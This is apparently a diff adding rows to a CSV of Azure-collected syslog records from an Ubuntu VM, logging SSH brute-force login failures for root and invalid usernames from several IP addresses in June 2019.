+10026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:17,UbuntuDevEnv,2019-06-25 22:53:16,auth,UbuntuDevEnv,info,Connection closed by 189.39.13.1 port 34521 [preauth],51087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,189.39.13.1,34521,,
+10027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:26,UbuntuDevEnv,2019-06-25 22:53:25,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.175 port 8118 [preauth],51114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,8118,,
+10028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:26,UbuntuDevEnv,2019-06-25 22:53:25,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.175 port 8118:11:  [preauth],51114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,8118,,
+10029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:30,UbuntuDevEnv,2019-06-25 22:53:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:32,UbuntuDevEnv,2019-06-25 22:53:31,auth,UbuntuDevEnv,info,Invalid user miguel from 178.62.54.79 port 44754,51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,178.62.54.7,44754,,
+10031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:32,UbuntuDevEnv,2019-06-25 22:53:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+10032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:32,UbuntuDevEnv,2019-06-25 22:53:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:33,UbuntuDevEnv,2019-06-25 22:53:32,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:34,UbuntuDevEnv,2019-06-25 22:53:34,auth,UbuntuDevEnv,info,Failed password for invalid user miguel from 178.62.54.79 port 44754 ssh2,51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,178.62.54.7,44754,,
+10035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:34,UbuntuDevEnv,2019-06-25 22:53:34,auth,UbuntuDevEnv,info,Disconnected from invalid user miguel 178.62.54.79 port 44754 [preauth],51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,178.62.54.7,44754,,
+10036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:34,UbuntuDevEnv,2019-06-25 22:53:34,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 44754:11: Bye Bye [preauth],51169,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,44754,,
+10037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:36,UbuntuDevEnv,2019-06-25 22:53:36,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:39,UbuntuDevEnv,2019-06-25 22:53:38,auth,UbuntuDevEnv,info,Invalid user ftp_test from 77.232.128.87 port 46513,51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,77.232.128.8,46513,,
+10039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:39,UbuntuDevEnv,2019-06-25 22:53:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:39,UbuntuDevEnv,2019-06-25 22:53:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:39,UbuntuDevEnv,2019-06-25 22:53:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:42,UbuntuDevEnv,2019-06-25 22:53:41,auth,UbuntuDevEnv,info,Failed password for invalid user ftp_test from 77.232.128.87 port 46513 ssh2,51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,77.232.128.8,46513,,
+10043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:42,UbuntuDevEnv,2019-06-25 22:53:41,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 46513:11: Bye Bye [preauth],51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,46513,,
+10044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:42,UbuntuDevEnv,2019-06-25 22:53:41,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp_test 77.232.128.87 port 46513 [preauth],51200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,77.232.128.8,46513,,
+10045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:42,UbuntuDevEnv,2019-06-25 22:53:41,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:43,UbuntuDevEnv,2019-06-25 22:53:42,auth,UbuntuDevEnv,info,Invalid user ftp_user from 152.250.252.179 port 49328,51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,152.250.252.1,49328,,
+10047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:43,UbuntuDevEnv,2019-06-25 22:53:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:43,UbuntuDevEnv,2019-06-25 22:53:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:45,UbuntuDevEnv,2019-06-25 22:53:44,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:45,UbuntuDevEnv,2019-06-25 22:53:44,auth,UbuntuDevEnv,info,Failed password for invalid user ftp_user from 152.250.252.179 port 49328 ssh2,51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,152.250.252.1,49328,,
+10051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:45,UbuntuDevEnv,2019-06-25 22:53:45,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp_user 152.250.252.179 port 49328 [preauth],51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,152.250.252.1,49328,,
+10052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:45,UbuntuDevEnv,2019-06-25 22:53:45,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 49328:11: Bye Bye [preauth],51212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,49328,,
+10053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:47,UbuntuDevEnv,2019-06-25 22:53:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:47,UbuntuDevEnv,2019-06-25 22:53:47,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 15049: Too many authentication failures [preauth],51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,15049,,
+10055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:47,UbuntuDevEnv,2019-06-25 22:53:47,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 15049 ssh2,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:47,UbuntuDevEnv,2019-06-25 22:53:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 15049 ssh2 [preauth],51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,15049,,
+10057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:47,UbuntuDevEnv,2019-06-25 22:53:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:51,UbuntuDevEnv,2019-06-25 22:53:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:53,UbuntuDevEnv,2019-06-25 22:53:53,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 28347 ssh2,51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28347,,
+10060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:01,UbuntuDevEnv,2019-06-25 22:54:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 28347 ssh2],51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28347,,
+10061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:03,UbuntuDevEnv,2019-06-25 22:54:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 28347 ssh2,51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28347,,
+10062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:11,UbuntuDevEnv,2019-06-25 22:54:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:11,UbuntuDevEnv,2019-06-25 22:54:11,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 28347 ssh2],51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28347,,
+10064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:11,UbuntuDevEnv,2019-06-25 22:54:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 28347 ssh2 [preauth],51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28347,,
+10065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:11,UbuntuDevEnv,2019-06-25 22:54:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 28347: Too many authentication failures [preauth],51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,28347,,
+10066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:11,UbuntuDevEnv,2019-06-25 22:54:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:15,UbuntuDevEnv,2019-06-25 22:54:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:17,UbuntuDevEnv,2019-06-25 22:54:16,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 42660 ssh2,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:21,UbuntuDevEnv,2019-06-25 22:54:19,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 42660 ssh2,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:21,UbuntuDevEnv,2019-06-25 22:54:21,auth,UbuntuDevEnv,info,Invalid user user from 139.199.113.140 port 43202,51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,139.199.113.1,43202,,
+10071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:21,UbuntuDevEnv,2019-06-25 22:54:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:21,UbuntuDevEnv,2019-06-25 22:54:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+10073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:22,UbuntuDevEnv,2019-06-25 22:54:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 42660 ssh2,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:23,UbuntuDevEnv,2019-06-25 22:54:22,auth,UbuntuDevEnv,info,Failed password for invalid user user from 139.199.113.140 port 43202 ssh2,51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,139.199.113.1,43202,,
+10075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:23,UbuntuDevEnv,2019-06-25 22:54:22,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 43202:11: Bye Bye [preauth],51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,43202,,
+10076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:23,UbuntuDevEnv,2019-06-25 22:54:22,auth,UbuntuDevEnv,info,Disconnected from invalid user user 139.199.113.140 port 43202 [preauth],51346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,139.199.113.1,43202,,
+10077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:24,UbuntuDevEnv,2019-06-25 22:54:24,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 42660 ssh2,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:30,UbuntuDevEnv,2019-06-25 22:54:29,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 42660 ssh2],51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:30,UbuntuDevEnv,2019-06-25 22:54:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 42660 ssh2 [preauth],51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42660,,
+10080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:30,UbuntuDevEnv,2019-06-25 22:54:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:30,UbuntuDevEnv,2019-06-25 22:54:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:30,UbuntuDevEnv,2019-06-25 22:54:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 42660: Too many authentication failures [preauth],51322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,42660,,
+10083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:33,UbuntuDevEnv,2019-06-25 22:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:35,UbuntuDevEnv,2019-06-25 22:54:35,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 53618 ssh2,51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,53618,,
+10085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:48,UbuntuDevEnv,2019-06-25 22:54:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
